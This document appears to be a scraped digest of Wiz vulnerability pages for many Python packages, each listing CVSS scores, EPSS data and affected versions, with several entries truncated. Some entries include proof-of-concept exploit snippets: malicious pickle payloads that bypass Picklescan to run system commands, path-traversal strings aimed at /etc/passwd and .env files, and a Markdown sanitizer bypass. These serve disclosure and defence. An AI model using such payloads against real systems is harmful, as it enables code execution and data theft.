blogs_wiz·CVSS 8.8
CVE-2026-29039 [HIGH] CVE-2026-29039 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29039 :
Python vulnerability analysis and mitigation
changedetection.io is a free open source web page change detection tool. Prior to version 0.54.4, the changedetection.io application allows users to specify XPath expressions as content filters via the include_filters field. These XPath expressions are processed using the elementpath library which implements XPath 3.0/3.1 specification. XPath 3.0 includes the unparsed-text() function which can read arbitrary files from the filesystem. The application does not validate or sanitize XPath expressions to block dangerous functions, allowing an attacker to read any file accessible to the application process. This issue has been patched in version 0.54.4.
Source : NVD
## 8.8
Score
Published March 6, 2026
Severity HIGH
CNA
Wiz
GHSA-58pv-8j8x-9vj2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-58pv-8j8x-9vj2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-58pv-8j8x-9vj2 :
Python vulnerability analysis and mitigation
## Summary
jaraco.context.tarball()
/
../
dummy_dir/../../etc/passwd
../../etc/passwd
dummy_dir/inner.tar.gz
dummy_dir/../../config/.env
../../config/.env
https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91
strip_first_component
## Details
The flow with setuptools in the mix:
setuptools._vendor.jaraco.context.tarball() > req = urlopen(url) > with tarfile.open(fileobj=req, mode='r|*') as tf: > tf.extractall(path=target_dir, filter=strip_first_component) > strip_first_component (Vulnerable)
## PoC
This was tested on multiple Python versions > 11 on a Debian GNU 12 (bookworm).
You can run this directly after having all the dependencies:
#!/usr/bin/env python3
import t
Wiz
CVE-2026-34726 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.4
CVE-2026-34726 [MEDIUM] CVE-2026-34726 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34726 :
Python vulnerability analysis and mitigation
Copier is a library and CLI app for rendering project templates. Prior to version 9.14.1, Copier's _subdirectory setting is documented as the subdirectory to use as the template root. However, the current implementation accepts parent-directory traversal such as .. and uses it directly when selecting the template root. As a result, a template can escape its own directory and make Copier render files from the parent directory without --UNSAFE. This issue has been patched in version 9.14.1.
Source : NVD
## 4.4
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 4.4
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
GHSA-46h3-79wf-xr6c Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-46h3-79wf-xr6c Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-46h3-79wf-xr6c :
Python vulnerability analysis and mitigation
## Summary
Picklescan uses _operator.attrgetter, which is a built-in python library function to execute remote pickle files.
## Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling the _operator.attrgetter function in the reduce method.
Then, when the victim, after checking whether the pickle file is safe by using the Picklescan library and finding that this library doesn't detect any dangerous functions, decides to call pickle.load() on this malicious pickle file, it leads to remote code execution.
## PoC
import pickle
import pickletools
opcode3 = b'''cbuiltins
__import__
(Vos
tRp0
0c_operator
attrgetter
(Vsystem
tR(g0
tR(Vecho "pwned by _operator.at
Wiz
CVE-2026-22612 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-22612 [HIGH] CVE-2026-22612 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22612 :
Python vulnerability analysis and mitigation
Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, Fickling is vulnerable to detection bypass due to "builtins" blindness. This issue has been patched in version 0.1.7.
Source : NVD
## 8.9
Score
Published January 10, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
fickling
Sources
NVD
pip Severity HIGH Has Fix Added at: Jan 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable,
Wiz
CVE-2025-68481 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2025-68481 [MEDIUM] CVE-2025-68481 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68481 :
Python vulnerability analysis and mitigation
generate_state_token()
state_data
state_secret
/authorize
.../callback?code=&state=
Source : NVD
## 8.8
Score
Published December 19, 2025
Severity HIGH
CNA Score 5.9
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
fastapi-users
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Dec 22, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Compo
Wiz
GHSA-rrxm-2pvv-m66x Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-rrxm-2pvv-m66x Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-rrxm-2pvv-m66x :
Python vulnerability analysis and mitigation
## Summary
numpy.f2py.crackfortran.getlincoef
## Details
numpy.f2py.crackfortran.getlincoef
__reduce__
## PoC
class PoC:
def __reduce__(self):
from numpy.f2py.crackfortran import getlincoef
return getlincoef, ("__import__('os').system('whoami')", None)
## Impact
Arbitrary code execution on the victim machine once they load the “scanned as safe” pickle / model file.
Affects any workflow relying on Picklescan to vet untrusted pickle / PyTorch artifacts.
Enables supply‑chain poisoning of shared model files.
## Credits
ac0d3r
Tong Liu , Institute of information engineering, CAS
Source : NVD
## 8.2
Score
Published December 30, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has
Wiz
CVE-2026-27932 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-27932 [HIGH] CVE-2026-27932 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27932 :
Python vulnerability analysis and mitigation
joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. In 1.6.2 and earlier, a resource exhaustion vulnerability in joserfc allows an unauthenticated attacker to cause a Denial of Service (DoS) via CPU exhaustion. When the library decrypts a JSON Web Encryption (JWE) token using Password-Based Encryption (PBES2) algorithms, it reads the p2c (PBES2 Count) parameter directly from the token's protected header. This parameter defines the number of iterations for the PBKDF2 key derivation function. Because joserfc does not validate or bound this value, an attacker can specify an extremely large iteration count (e.g., 2^31 - 1), forcing the server to expend mass
Wiz
GHSA-5vp3-3cg6-2rq3 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-5vp3-3cg6-2rq3 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5vp3-3cg6-2rq3 :
Python vulnerability analysis and mitigation
## Summary
to_markdown()
## Details
opens a fenced block with a fixed delimiter of ``````
writes the decoded text directly into the output
## Reproduction
from justhtml import JustHTML
payload = "```\n "
doc = JustHTML(payload, fragment=True) # default sanitize=True
print(doc.to_html(pretty=False))
# ```
#
print(doc.to_markdown())
# ```
# ```
#
# ```
Rendered as CommonMark/GFM-style Markdown, that output is interpreted as:
Line 1 opens a fenced code block
Line 2 closes it
Line 3 is raw HTML outside the fence
Line 4 opens a new fence
## Impact
JustHTML(..., sanitize=True).to_markdown()
## Root Cause
## Fix
Source : NVD
## 7.1
Score
Published March 24, 2026
Severity HIGH
CNA Score
Wiz
CVE-2026-33936 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33936 [MEDIUM] CVE-2026-33936 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33936 :
Python vulnerability analysis and mitigation
ecdsa
ecdsa.der.remove_octet_string()
SigningKey.from_der()
IndexError: index out of bounds on dimension 1
UnexpectedDER
ValueError
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ecdsa
python-ecdsa
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 29, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 29, 2026
Echo Severity MEDIUM No Fix Added at: Mar 29, 2026
pip Severity MEDIUM Has Fix Added at: Ma
Wiz
CVE-2026-30974 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2026-30974 [MEDIUM] CVE-2026-30974 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30974 :
Python vulnerability analysis and mitigation
Copyparty is a portable file server. Prior to v1.20.11., the nohtml config option, intended to prevent execution of JavaScript in user-uploaded HTML files, did not apply to SVG images. A user with write-permission could upload an SVG containing embedded JavaScript, which would execute in the context of whichever user opens it. This has been fixed in v1.20.11.
Source : NVD
## 5.4
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Python
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
copyparty
Sources
NVD
Wiz
CVE-2026-29778 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-29778 [HIGH] CVE-2026-29778 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29778 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. From version 0.5.0b3.dev13 to 0.5.0b3.dev96, the edit_package() function implements insufficient sanitization for the pack_folder parameter. The current protection relies on a single-pass string replacement of "../", which can be bypassed using crafted recursive traversal sequences. This issue has been patched in version 0.5.0b3.dev97.
Source : NVD
## 6.5
Score
Published March 7, 2026
Severity MEDIUM
CNA Score 7.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and
Wiz
CVE-2025-68143 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2025-68143 [MEDIUM] CVE-2025-68143 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68143 :
Python vulnerability analysis and mitigation
Model Context Protocol Servers is a collection of reference implementations for the model context protocol (MCP). In mcp-server-git versions prior to 2025.9.25, the git_init tool accepted arbitrary filesystem paths and created Git repositories without validating the target location. Unlike other tools which required an existing repository, git_init could operate on any directory accessible to the server process, making those directories eligible for subsequent git operations. The tool was removed entirely, as the server is intended to operate on existing repositories only. Users are advised to upgrade to 2025.9.25 or newer to remediate this issue.
Source : NVD
## 6.5
Score
Published December 17, 2025
Severity MEDIUM
Wiz
CVE-2026-28352 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-28352 [MEDIUM] CVE-2026-28352 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28352 :
Python vulnerability analysis and mitigation
Indico is an event management system that uses Flask-Multipass, a multi-backend authentication system for Flask. In versions prior to 3.3.11, the API endpoint used to manage event series is missing an access check, allowing unauthenticated/unauthorized access to this endpoint. The impact of this is limited to getting the metadata (title, category chain, start/end date) for events in an existing series, deleting an existing event series, and modifying an existing event series. This vulnerability does NOT allow unauthorized access to events (beyond the basic metadata mentioned above), nor any kind of tampering with user-visible data in events. Version 3.3.11 fixes the issue. As a workaround, use the webserver to restrict acce
Wiz
CVE-2026-34543 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-34543 [HIGH] CVE-2026-34543 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34543 :
Python vulnerability analysis and mitigation
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From version 3.4.0 to before version 3.4.8, sensitive information from heap memory may be leaked through the decoded pixel data (information disclosure). This occurs under default settings; simply reading a malicious EXR file is sufficient to trigger the issue, without any user interaction. This issue has been patched in version 3.4.8.
Source : NVD
## 8.7
Score
Published April 1, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability P
Wiz
CVE-2025-69207 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-69207 [MEDIUM] CVE-2025-69207 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69207 :
Python vulnerability analysis and mitigation
Khoj is a self-hostable artificial intelligence app. Prior to 2.0.0-beta.23, an IDOR in the Notion OAuth callback allows an attacker to hijack any user's Notion integration by manipulating the state parameter. The callback endpoint accepts any user UUID without verifying the OAuth flow was initiated by that user, allowing attackers to replace victims' Notion configurations with their own, resulting in data poisoning and unauthorized access to the victim's Khoj search index. This attack requires knowing the user's UUID which can be leaked through shared conversations where an AI generated image is present. This vulnerability is fixed in 2.0.0-beta.23.
Source : NVD
## 7.1
Score
Published February 2, 2026
Severity HIGH
Wiz
CVE-2026-0599 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-0599 [HIGH] CVE-2026-0599 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0599 :
Python vulnerability analysis and mitigation
A vulnerability in huggingface/text-generation-inference version 3.3.6 allows unauthenticated remote attackers to exploit unbounded external image fetching during input validation in VLM mode. The issue arises when the router scans inputs for Markdown image links and performs a blocking HTTP GET request, reading the entire response body into memory and cloning it before decoding. This behavior can lead to resource exhaustion, including network bandwidth saturation, memory inflation, and CPU overutilization. The vulnerability is triggered even if the request is later rejected for exceeding token limits. The default deployment configuration, which lacks memory usage limits and authentication, exacerbates the impact, potentiall
Wiz
CVE-2026-4269 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-4269 [CRITICAL] CVE-2026-4269 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4269 :
Python vulnerability analysis and mitigation
A missing S3 ownership verification in the Bedrock AgentCore Starter Toolkit before version v0.1.13 may allow a remote actor to inject code during the build process, leading to code execution in the AgentCore Runtime. This issue only affects users of the Bedrock AgentCore Starter Toolkit before version v0.1.13 who build or have built the Toolkit after September 24, 2025. Any users on a version >=v0.1.13, and any users on previous versions who built the toolkit before September 24, 2025 are not affected.
To remediate this issue, customers should upgrade to version v0.1.13.
Source : NVD
## 5.8
Score
Published March 16, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Python
Has Public Exploit No
Has CISA K
Wiz
CVE-2026-23535 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
CVE-2026-23535 [HIGH] CVE-2026-23535 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23535 :
Python vulnerability analysis and mitigation
wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.2, the multi-translation download could write to an arbitrary location when instructed by a crafted server. This vulnerability is fixed in 1.17.2.
Source : NVD
## 8
Score
Published January 16, 2026
Severity HIGH
CNA Score 8.0
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wlc
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Jan 18, 2026
Debian 14 Severity HIGH No Fix Added at: Jan 18, 2026
Echo Severity HIGH No
Wiz
CVE-2026-21441 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-21441 [HIGH] CVE-2026-21441 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21441 :
Python vulnerability analysis and mitigation
Content-Encoding
gzip
deflate
br
zstd
preload_content=False
preload_content=False
redirect=False
Source : NVD
## 8.9
Score
Published January 7, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
TensorFlow
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
rhel9/s2i-core
rhel8/go-toolset
Sources
NVD
AlmaLinux 8 Severity HIGH Has Fix Added at: Jan 27, 2026
AlmaLinux 9 Severity HIGH Has Fix Added at: Jan 27, 2026
Alpine 3.20, 3.21, 3.22 Severity HIGH Has Fix Added at: Jan 25, 2026
Alpine 3.23 Severity HIGH Has Fix Added at: Jan
Wiz
CVE-2026-25577 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-25577 [HIGH] CVE-2026-25577 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25577 :
Python vulnerability analysis and mitigation
Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticated attackers to trigger HTTP 500 errors and cause denial of service. This vulnerability is fixed in 1.3.11.
Source : NVD
## 7.5
Score
Published February 10, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
emmett-core
Sources
NVD
pip Severity
Wiz
GHSA-4rh7-jwg9-m28m Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-4rh7-jwg9-m28m Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-4rh7-jwg9-m28m :
Python vulnerability analysis and mitigation
## Summary
Refresh tokens are accepted as URL query parameters in the keyserver and telemetry server routes.
## Affected Code
# openssl_encrypt_server/modules/keyserver/routes.py:214-215
# openssl_encrypt_server/modules/telemetry/routes.py:90-91
async def refresh_token(
request: Request,
refresh_token: str = Query(..., description="Refresh token")
):
## Impact
Tokens in URL query parameters are exposed in:
Server access logs
Proxy/CDN logs
Browser history
HTTP Referer headers
Network monitoring toolsThis creates significant token leakage risk.
## Recommended Fix
Accept refresh tokens in the request body (POST) instead of query parameters
Body(...)
Query(...)
## Fix
4b2adb0
releases/1.4.x
Sou
Wiz
CVE-2026-27614 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-27614 [CRITICAL] CVE-2026-27614 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27614 :
Python vulnerability analysis and mitigation
_pygmentize_lines()
theme/templatetags/issues.py:75-77
mark_safe()
Source : NVD
## 6.1
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
bugsink
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV e
Wiz
CVE-2026-1213 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-1213 [MEDIUM] CVE-2026-1213 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1213 :
Python vulnerability analysis and mitigation
All versions of askbot before and including 0.12.2 allow an attacker authenticated with normal user permissions to modify the profile picture of other application users.This issue affects askbot: 0.12.2.
Source : NVD
## 5.3
Score
Published January 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
askbot
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 28, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable,
Wiz
CVE-2026-22251 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-22251 [MEDIUM] CVE-2026-22251 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22251 :
Python vulnerability analysis and mitigation
wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.0, wlc supported providing unscoped API keys in the setting. This practice was discouraged for years, but the code was never removed. This might cause the API key to be leaked to different servers.
Source : NVD
## 5.5
Score
Published January 12, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wlc
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Jan 13, 2026
Echo Severity MED
Wiz
CVE-2026-34952 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34952 [CRITICAL] CVE-2026-34952 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34952 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.97, the PraisonAI Gateway server accepts WebSocket connections at /ws and serves agent topology at /info with no authentication. Any network client can connect, enumerate registered agents, and send arbitrary messages to agents and their tool sets. This issue has been patched in version 4.5.97.
Source : NVD
## 9.1
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
praisonai
Sources
NVD
pip Severit
Wiz
CVE-2026-27825 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.0
CVE-2026-27825 [CRITICAL] CVE-2026-27825 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27825 :
Python vulnerability analysis and mitigation
confluence_download_attachment
download_path
/etc/cron.d/
Source : NVD
## 8
Score
Published March 10, 2026
Severity HIGH
CNA Score 9.0
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mcp-atlassian
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Mar 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has
Wiz
CVE-2025-64712 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-64712 [CRITICAL] CVE-2025-64712 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-64712 :
Python vulnerability analysis and mitigation
The unstructured library provides open-source components for ingesting and pre-processing images and text documents, such as PDFs, HTML, Word docs, and many more. Prior to version 0.18.18, a path traversal vulnerability in the partition_msg function allows an attacker to write or overwrite arbitrary files on the filesystem when processing malicious MSG files with attachments. This issue has been patched in version 0.18.18.
Source : NVD
## 9.8
Score
Published February 4, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 31.6
Exploitation Probabil
Wiz
CVE-2026-25732 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-25732 [HIGH] CVE-2026-25732 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25732 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. Prior to 3.7.0, NiceGUI's FileUpload.name property exposes client-supplied filename metadata without sanitization, enabling path traversal when developers use the pattern UPLOAD_DIR / file.name. Malicious filenames containing ../ sequences allow attackers to write files outside intended directories, with potential for remote code execution through application file overwrites in vulnerable deployment patterns. This design creates a prevalent security footgun affecting applications following common community patterns. Note: Exploitation requires application code incorporating file.name into filesystem paths without sanitization. Applications using fixed paths, generated filenames, or ex
Wiz
CVE-2026-35492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-35492 [MEDIUM] CVE-2026-35492 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35492 :
Python vulnerability analysis and mitigation
## Impact
PartitionedDataset in kedro-datasets was vulnerable to path traversal. Partition IDs were concatenated directly with the dataset base path without validation. An attacker or malicious input containing .. components in a partition ID could cause files to be written outside the configured dataset directory, potentially overwriting arbitrary files on the filesystem.
Users of PartitionedDataset with any storage backend (local filesystem, S3, GCS, etc.) are affected.
## Patches
posixpath.normpath
DatasetError
## Workarounds
..
## References
Fix: https://github.com/kedro-org/kedro-plugins/pull/1346 Report: https://github.com/kedro-org/kedro/issues/5452
Source : NVD
## 6.5
Score
Published April 6, 20
Wiz
CVE-2026-24159 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-24159 [HIGH] CVE-2026-24159 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24159 :
Python vulnerability analysis and mitigation
NVIDIA NeMo Framework contains a vulnerability where an attacker may cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure and data tampering.
Source : NVD
## 9.8
Score
Published March 24, 2026
Severity CRITICAL
CNA Score 7.8
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
nemo-toolkit
nemo
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 02, 2026
Nix Severity CRITICAL Has Fix Added at: Apr 02, 2026
## Get
Wiz
CVE-2026-32714 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-32714 [CRITICAL] CVE-2026-32714 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32714 :
Python vulnerability analysis and mitigation
SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.6, the KeyCache class in scitokens was vulnerable to SQL Injection because it used Python's str.format() to construct SQL queries with user-supplied data (such as issuer and key_id). This allowed an attacker to execute arbitrary SQL commands against the local SQLite database. This issue has been patched in version 1.9.6.
Source : NVD
## 9.8
Score
Published March 31, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.9
Exploitation Probability (EPSS) N/A
Affected pack
Wiz
GHSA-5hwf-rc88-82xm Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-5hwf-rc88-82xm Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5hwf-rc88-82xm :
Python vulnerability analysis and mitigation
## Assessment
uuid
_osx_support
_aix_support
## Original report
## Summary
UNSAFE_IMPORTS
uuid
_osx_support
_aix_support
subprocess.Popen()
os.system()
UnsafeImports
NonStandardImports
## Affected Versions
fickling <= 0.1.8 (all versions)
## Details
## Missing Modules
UNSAFE_IMPORTS
uuid
_get_command_stdout(cmd, *args)
subprocess.Popen((cmd,) + args, stdout=PIPE, stderr=DEVNULL)
All platforms
_osx_support
_read_output(cmdstring)
os.system(cmd)
All platforms
_osx_support
_find_build_tool(toolname)
%s
_read_output("/usr/bin/xcrun -find %s" % toolname)
All platforms
_aix_support
_read_cmd_output(cmdstring)
os.system(cmd)
All platforms
_osx_support
_aix_support
## Why These P
Wiz
CVE-2026-33236 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33236 [HIGH] CVE-2026-33236 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33236 :
Python vulnerability analysis and mitigation
subdir
id
../
Source : NVD
## 8.1
Score
Published March 20, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nltk
py3-nltk
Sources
NVD
Chainguard Has Fix Added at: Mar 26, 2026
Debian 11, 14 Severity HIGH No Fix Added at: Mar 21, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 21, 2026
Echo Severity HIGH No Fix Added at: Mar 21, 2026
pip Severity HIGH No Fix Added at: Mar 20, 2026
Wolfi Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prior
Wiz
CVE-2026-27622 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2026-27622 [HIGH] CVE-2026-27622 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27622 :
